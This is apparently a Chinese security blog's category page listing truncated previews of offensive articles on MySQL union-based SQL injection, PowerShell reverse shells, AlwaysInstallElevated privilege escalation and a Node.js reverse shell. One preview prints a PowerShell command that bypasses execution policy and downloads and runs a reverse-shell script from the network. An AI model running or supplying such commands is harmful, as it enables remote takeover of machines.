1、Mysql 手工注入【常规union查询篇】 15
在开始真正的注入技巧之前,我们先来大致回顾下必要的mysql数据库基础 下面是注入mysql时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些waf的时候 字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接...
Get shell By Powershell
Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/s...
AlwaysInstallElevated 特权安全提权 3
Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。Windows环境提供组策略设...
Node.js反向Shell
如下的Javascript就是一个Node.js的反向连接shell 这个payload将会生成一个/bin/sh的shell,创建一个TCP连接到攻击者的服务器,并且在通信数据流中绑定shell命令。 为了优雅的执行payload,我们还需要一些小技巧,我们将反向连接shell...
搜索当前分类